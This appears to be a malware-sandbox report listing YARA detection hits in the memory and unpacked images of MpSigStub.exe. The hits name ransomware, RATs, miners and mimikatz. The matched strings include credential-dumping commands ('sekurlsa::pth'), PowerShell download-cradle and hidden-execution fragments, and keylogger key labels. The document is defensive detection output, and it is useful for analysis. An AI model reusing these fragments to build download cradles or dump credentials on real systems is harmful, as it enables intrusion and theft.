Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_PornRansomware	Yara detected Porn Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_RegretLocker	Yara detected RegretLocker Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Thanos	Yara detected Thanos ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_covid19	Yara detected Covid19 Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_MaliciousMacro	Yara detected MaliciousMacro	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_PasteDownloader	Yara detected PasteDownloader	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Sapphire	Yara detected Sapphire Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Predator	Yara detected Predator	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	vanquish_2	Webshells Auto-generated - file vanquish.exe	Yara Bulk Rule Generator by Florian Roth	0x257b29:$s2: Vanquish - DLL injection failed: 0x257b4b:$s2: Vanquish - DLL injection failed:
Process Memory Space: MpSigStub.exe PID: 7120	fe_cpe_ms17_010_ransomware	probable petya ransomware using eternalblue, wmic, psexec	ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick	0x6ea7d:$dmap01: \\.\PhysicalDrive 0x6eaa1:$dmap01: \\.\PhysicalDrive 0x1335b4:$dmap01: \\.\PHYSICALDRIVE 0x243cfa:$dmap01: \\.\PhysicalDrive 0x24e924:$dmap01: \\.\PhysicalDrive 0x2b57f6:$dmap01: \\.\PhysicalDrive 0x3b8157:$dmap01: \\.\PhysicalDrive 0x4f882f:$dmap01: \\.\PHYSICALDRIVE 0x5703c5:$dmap01: \\.\PHYSICALDRIVE 0x5cbe58:$dmap01: \\.\PHYSICALDRIVE 0x5cbe91:$dmap01: \\.\PHYSICALDRIVE 0x797aa3:$dmap01: \\.\PHYSICALDRIVE 0x80ae94:$dmap01: \\.\PHYSICALDRIVE 0x80b3bb:$dmap01: \\.\PhysicalDrive 0x86c68a:$dmap01: \\.\PhysicalDrive 0x8a37cf:$dmap01: \\.\PhysicalDrive 0x8d015f:$dmap01: \\.\PhysicalDrive 0x978d2b:$dmap01: \\.\PHYSICALDRIVE 0x9b3dd2:$dmap01: \\.\Physicaldrive 0xb85438:$dmap01: \\.\PHYSICALDRIVE 0xba1971:$dmap01: \\.\PHYSICALDRIVE
Process Memory Space: MpSigStub.exe PID: 7120	APT9002Strings	9002 Identifying Strings	Seth Hardy	0x26595c:$: %%TEMP%%\%s_p.ax
Process Memory Space: MpSigStub.exe PID: 7120	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x321d61:$cUp: Upload failed! [Remote error code: 0xa35a48:$cUp: Upload failed! [Remote error code: 0xa35a8b:$GDGSYDLYR: GDGSYDLYR_%
Process Memory Space: MpSigStub.exe PID: 7120	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x6ec481:$: Neo,welcome to the desert of real.
Process Memory Space: MpSigStub.exe PID: 7120	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfc3e7:$a: NanoCore 0x204699:$a: NanoCore 0x27a0ab:$a: NanoCore 0x32cfc2:$a: NanoCore 0x3dd5f5:$a: NanoCore 0x438856:$a: NanoCore 0x442039:$a: NanoCore 0x503d35:$a: NanoCore 0x669b69:$a: NanoCore 0x73884f:$a: NanoCore 0x73b72e:$a: NanoCore 0x7c72ac:$a: NanoCore 0x9223e0:$a: NanoCore 0xaa9d73:$a: NanoCore 0xc6b02a:$a: NanoCore 0xc6b040:$a: NanoCore 0xcb6dde:$a: NanoCore 0xcc07c1:$a: NanoCore 0xe3597:$b: ClientPlugin 0xe35b0:$b: ClientPlugin 0xe35c1:$b: ClientPlugin
Process Memory Space: MpSigStub.exe PID: 7120	NetWiredRC_B	NetWiredRC	Jean-Philippe Teissier / @Jipe_	0x774d0e:$str4: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0xded35:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x76ec3a:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x774d16:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x30adbd:$klg1: [Backspace] 0x886304:$klg1: [Backspace] 0x6facaa:$klg2: [Enter] 0x6facbe:$klg2: [Enter] 0xbb9c24:$klg2: [Enter] 0x30adcf:$klg3: [Tab] 0x3e75d4:$klg8: [Home] 0xb43141:$klg10: [Page Down] 0xb4314d:$klg11: [End] 0x6e07dd:$klg14: [Insert] 0x144edf:$klg15: [Print Screen] 0x276d24:$klg16: [Scroll Lock] 0x8862f8:$klg17: [Caps Lock] 0x88630f:$klg17: [Caps Lock] 0x3681b2:$klg18: [Alt] 0x30adc9:$klg19: [Esc]
Process Memory Space: MpSigStub.exe PID: 7120	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0x80d442:$v2: mozsqlite3 0xd16107:$v2: mozsqlite3 0x276d24:$v3: [Scroll Lock] 0x53805a:$v4: GetRawInputData 0x53900a:$v4: GetRawInputData 0xb7d97a:$v4: GetRawInputData 0xc5ccc7:$v4: GetRawInputData 0x76ec29:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
Process Memory Space: MpSigStub.exe PID: 7120	PoisonIvy_3	unknown	Kevin Breen <kevin@techanarchy.net>	0x7a6297:$stub: StubPath 0x7a62b5:$stub: StubPath 0x7df113:$stub: StubPath 0x16faf1:$string1: CONNECT %s:%i HTTP/1.0 0x1f10d8:$string2: ws2_32 0x1ff75a:$string2: ws2_32 0x2111b6:$string2: ws2_32 0x2113c2:$string2: ws2_32 0x211440:$string2: ws2_32 0x21163a:$string2: ws2_32 0x2330b9:$string2: ws2_32 0x2330c0:$string2: ws2_32 0x2662ce:$string2: ws2_32 0x2808c1:$string2: ws2_32 0x2808cb:$string2: ws2_32 0x2876c5:$string2: ws2_32 0x3eb50e:$string2: ws2_32 0x3eb530:$string2: ws2_32 0x3eb585:$string2: ws2_32 0x3eb5a7:$string2: ws2_32 0x3eb5f9:$string2: ws2_32
Process Memory Space: MpSigStub.exe PID: 7120	CVE_2018_4878_0day_ITW	unknown	unknown	0x46b4c1:$known1: f:\work\flash\obfuscation\loadswf\src 0x46b50c:$known1: f:\work\flash\obfuscation\loadswf\src 0x46b4c1:$known5: f:\work\flash\obfuscation\loadswf\src 0x46b50c:$known5: f:\work\flash\obfuscation\loadswf\src 0x7dc6f3:$header: rdf:RDF 0x425f8b:$loader1: URLRequest 0x425f96:$loader1: URLRequest 0x425f23:$loader2: URLLoader 0x425f2d:$loader2: URLLoader 0x46b49e:$loader3: loadswf 0x46b4af:$loader3: loadswf 0x46b4b9:$loader3: loadswf 0x46b4db:$loader3: loadswf 0x46b4e9:$loader3: loadswf 0x46b4fa:$loader3: loadswf 0x46b504:$loader3: loadswf 0x46b526:$loader3: loadswf 0x10c61a:$flash_magic: 5A 57 53 0x10c62f:$flash_magic: 5A 57 53 0x184784:$flash_magic: 5A 57 53 0x1847b3:$flash_magic: 5A 57 53
Click to see the 579 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
35.3.MpSigStub.exe.28bd63a2bca.206.unpack	Oilrig_IntelSecurityManager	Detects OilRig malware	Eyal Sela	0x9a1:$one3: srvCheckresponded
35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x72db:$s1: http:// 0x72f2:$s1: http:// 0x730a:$s1: http:// 0x787f:$s1: http:// 0xae14:$s1: lppt>++ 0xae08:$s2: lpptw>++ 0x72db:$f1: http:// 0x72f2:$f1: http:// 0x730a:$f1: http:// 0x787f:$f1: http://
35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0xa7af:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack	Derusbi_Kernel_Driver_WD_UDFS	Detects Derusbi Kernel Driver	Florian Roth	0x74d2:$x3: \??\pipe\usbpcex%d 0x7520:$x4: \??\pipe\usbpcg%d
35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0xae1f:$xo1: Ik~mhhe+1*4
35.3.MpSigStub.exe.28bd69011fa.70.raw.unpack	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x1466d:$s3: hhhhh.exe 0x14657:$s4: ttttt.exe 0x14641:$s6: cle.log.1
35.3.MpSigStub.exe.28bd78ce0e6.219.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x75e3:$s1: http:// 0x9606:$s1: http:// 0xb6ab:$s1: http:// 0xd582:$s1: )551{nn 0xd59a:$s1: http:// 0xf168:$s1: http:// 0xf2a5:$s1: http:// 0xf2c0:$s1: http:// 0xf2df:$s1: http:// 0xf2f9:$s1: http:// 0xf317:$s1: http:// 0xf333:$s1: http:// 0xfa6e:$s1: http:// 0xfa8a:$s1: http:// 0xfab2:$s1: http:// 0xfada:$s1: http:// 0xfb12:$s1: http:// 0xfb9d:$s1: http:// 0x1c1a4:$s1: http:// 0x1d2dc:$s1: http:// 0x1d9c4:$s1: http://
35.3.MpSigStub.exe.28bd7b2bc01.176.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x995d:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7b2bc01.176.raw.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
35.3.MpSigStub.exe.28bd718e899.156.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xcbef:$s1: stratum+tcp:// 0xd80b:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd718e899.156.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x22957:$e3: exe.rerolpxe
35.3.MpSigStub.exe.28bd718e899.156.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
35.3.MpSigStub.exe.28bd68763ba.143.unpack	APT_APT29_wellmess_dotnet_unique_strings	Rule to detect WellMess .NET samples based on unique strings and function/variable names	NCSC	0x1868:$s1: HealthInterval 0x18aa:$s3: Start bot: 0x17d6:$s4: FromNormalToBase64 0x177b:$s6: WellMess
35.3.MpSigStub.exe.28bd6901bfe.72.raw.unpack	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x13c69:$s3: hhhhh.exe 0x13c53:$s4: ttttt.exe 0x13c3d:$s6: cle.log.1
35.3.MpSigStub.exe.28bd63a15c6.205.raw.unpack	Oilrig_IntelSecurityManager	Detects OilRig malware	Eyal Sela	0x2ba5:$one3: srvCheckresponded
35.3.MpSigStub.exe.28bd63a15c6.205.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x54d3:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd63a15c6.205.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd718d495.114.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xdff3:$s1: stratum+tcp:// 0xec0f:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd718d495.114.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x23d5b:$e3: exe.rerolpxe
35.3.MpSigStub.exe.28bd718d495.114.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x8b2a:$: odhyrfjcnfkdtslt
35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x8552:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x4631:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x4e3c:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x4e4c:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
35.3.MpSigStub.exe.28bd7b2bc01.58.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x995d:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7b2bc01.58.raw.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
35.3.MpSigStub.exe.28bd703f03e.63.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x2122a:$s1: sekurlsa::msv 0x212ac:$s7: sekurlsa::ssp 0x2126b:$s11: sekurlsa::pth
35.3.MpSigStub.exe.28bd7b2bc01.215.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x995d:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7b2bc01.215.raw.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
35.3.MpSigStub.exe.28bd703fc42.61.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x20626:$s1: sekurlsa::msv 0x206a8:$s7: sekurlsa::ssp 0x20667:$s11: sekurlsa::pth
35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack	Trojan_Win32_PlaKeylog_B	Keylogger component	Microsoft	0x23117:$hook: C6 06 FF 46 C6 06 25 0x23122:$dasm_engine: 80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05
35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack	APT_DNSpionage_Karkoff_Malware_Apr19_1	Detects DNSpionage Karkoff malware	Florian Roth	0x28c16:$x3: rimrun.com
35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x29592:$s15: [+] OK! I Closed The Two Socket.
35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack	SUSP_DropperBackdoor_Keywords	Detects suspicious keywords that indicate a backdoor	Florian Roth	0x28bf5:$x4: DropperBackdoor
35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack	APT_APT41_POISONPLUG	Detects APT41 malware POISONPLUG	Florian Roth	0x27e7f:$s2: [-]write failed[%d] 0x27e6d:$s3: [-]load failed
35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0x2b421:$s5: emailAddress= 0x2b411:$s7: www.naver.com 0x2b3e0:$x2: reykfgkodfgkfdskgdfogpdokgsdfpg 0x2b3c2:$x3: fjiejffndxklfsdkfjsaadiepwn
35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd680fb5a.152.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.raw.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0x19539:$x1: \Mini rat\
35.3.MpSigStub.exe.28bd780418a.59.raw.unpack	SUSP_PDB_Strings_Keylogger_Backdoor	Detects PDB strings used in backdoors or keyloggers	Florian Roth	0x187bc:$: \Debug\KeyLogger
35.3.MpSigStub.exe.28bd72c6dd5.218.raw.unpack	CredTheft_MSIL_TitoSpecial_1	This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code.	FireEye	0x1edc8:$str1: Minidump 0x1edd5:$str2: dumpType 0x1c045:$str3: WriteProcessMemory 0x1ede2:$str3: WriteProcessMemory 0x1edf9:$str4: bInheritHandle 0x1ee0c:$str5: GetProcessById 0x1ee1f:$str6: SafeHandle 0x1ee2e:$str7: BeginInvoke 0x1ee3e:$str8: EndInvoke 0x1ee4c:$str9: ConsoleApplication1 0x1ee64:$str10: getOSInfo 0x1ee72:$str11: OpenProcess 0x1ee82:$str12: LoadLibrary 0x23805:$str12: LoadLibrary 0x2383b:$str12: LoadLibrary 0x1ee92:$str13: GetProcAddress 0x2724c:$str13: GetProcAddress
35.3.MpSigStub.exe.28bd736083d.96.raw.unpack	HackTool_Samples	Hacktool	unknown	0x24395:$c: Failed to load SAM functions
35.3.MpSigStub.exe.28bd736083d.96.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7b65929.38.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x1863:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x1885:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
35.3.MpSigStub.exe.28bd703e43a.62.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x21e2e:$s1: sekurlsa::msv 0x21eb0:$s7: sekurlsa::ssp 0x21e6f:$s11: sekurlsa::pth
35.3.MpSigStub.exe.28bd77beebe.15.raw.unpack	SUSP_XMRIG_String	Detects a suspicious XMRIG crypto miner executable string in filr	Florian Roth	0x73df:$x1: xmrig.exe
35.3.MpSigStub.exe.28bd77beebe.15.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7098dc6.98.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x69fd:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7098dc6.98.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x18cf7:$x1: ReflectiveLoader
35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0x1749f:$: DECRYPT_YOUR_FILES
35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack	APT_PupyRAT_PY	Detects Pupy RAT	Florian Roth	0x18caf:$x1: reflective_inject_dll 0x18d66:$x1: reflective_inject_dll
35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x18cc9:$x1: reflectively inject a dll into a process. 0x18caf:$x4: reflective_inject_dll 0x18d66:$x4: reflective_inject_dll 0x18caf:$x8: reflective_inject_dll 0x18d66:$x8: reflective_inject_dll 0x18d66:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x933f:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
35.3.MpSigStub.exe.28bd67c4b16.150.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0x577b3:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
35.3.MpSigStub.exe.28bd67c4b16.150.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x5c9ac:$sb1: -w hidden 0x5c9b6:$sc1: -nop 0x5c9bb:$se1: -ep bypass 0x3a863:$se3: -ExecutionPolicy Bypass
35.3.MpSigStub.exe.28bd67c4b16.150.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
35.3.MpSigStub.exe.28bd67c4b16.150.unpack	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
35.3.MpSigStub.exe.28bd67c4b16.150.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
35.3.MpSigStub.exe.28bd67c4b16.150.unpack	JoeSecurity_Cute	Yara detected Cute Ransomware	Joe Security
35.3.MpSigStub.exe.28bd67c4b16.150.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd680fb5a.221.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd63ac0ae.183.raw.unpack	XOR_4byte_Key	Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)	Florian Roth	0x39df6:$s1: 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2
35.3.MpSigStub.exe.28bd66af16e.159.raw.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x5704:$s1: 7ZSfx%03x.cmd 0x85d:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x144d:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x205d:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
35.3.MpSigStub.exe.28bd78ce0e6.54.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x75e3:$s1: http:// 0x9606:$s1: http:// 0xb6ab:$s1: http:// 0xd582:$s1: )551{nn 0xd59a:$s1: http:// 0xf168:$s1: http:// 0xf2a5:$s1: http:// 0xf2c0:$s1: http:// 0xf2df:$s1: http:// 0xf2f9:$s1: http:// 0xf317:$s1: http:// 0xf333:$s1: http:// 0xfa6e:$s1: http:// 0xfa8a:$s1: http:// 0xfab2:$s1: http:// 0xfada:$s1: http:// 0xfb12:$s1: http:// 0xfb9d:$s1: http:// 0x1c1a4:$s1: http:// 0x1d2dc:$s1: http:// 0x1d9c4:$s1: http://
35.3.MpSigStub.exe.28bd6078d79.112.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd7421296.87.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd63a2bca.206.raw.unpack	Oilrig_IntelSecurityManager	Detects OilRig malware	Eyal Sela	0x15a1:$one3: srvCheckresponded
35.3.MpSigStub.exe.28bd63a2bca.206.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3ecf:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd63a2bca.206.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.raw.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0x19539:$x1: \Mini rat\
35.3.MpSigStub.exe.28bd780418a.26.raw.unpack	SUSP_PDB_Strings_Keylogger_Backdoor	Detects PDB strings used in backdoors or keyloggers	Florian Roth	0x187bc:$: \Debug\KeyLogger
35.3.MpSigStub.exe.28bd7ec89ca.90.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x25772:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7ec89ca.90.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7ec89ca.90.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd6408d22.17.raw.unpack	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x14682:$a1: net.webclient).downloadstring 0x15073:$a1: net.webclient).downloadstring 0x15de0:$a1: net.webclient).downloadstring 0x146a9:$a2: gist.githubusercontent.com
35.3.MpSigStub.exe.28bd6408d22.17.raw.unpack	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x1467b:$s2: system.net.webclient).downloadstring('http
35.3.MpSigStub.exe.28bd62c32d4.74.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0xb332:$: odhyrfjcnfkdtslt
35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0xad5a:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x6e39:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x7644:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x7654:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
35.3.MpSigStub.exe.28bd62c283a.76.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd680fb5a.211.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd62c32d4.170.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd710f28f.126.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd6625a01.91.raw.unpack	SUSP_PDB_Path_Keywords	Detects suspicious PDB paths	Florian Roth	0x9d31:$: ShellCode.pdb
35.3.MpSigStub.exe.28bd7ecabce.191.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2356e:$s1: stratum+tcp://
35.3.MpSigStub.exe.28bd7ecabce.191.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7ecabce.191.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd62c283a.171.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0xb332:$: odhyrfjcnfkdtslt
35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0xad5a:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
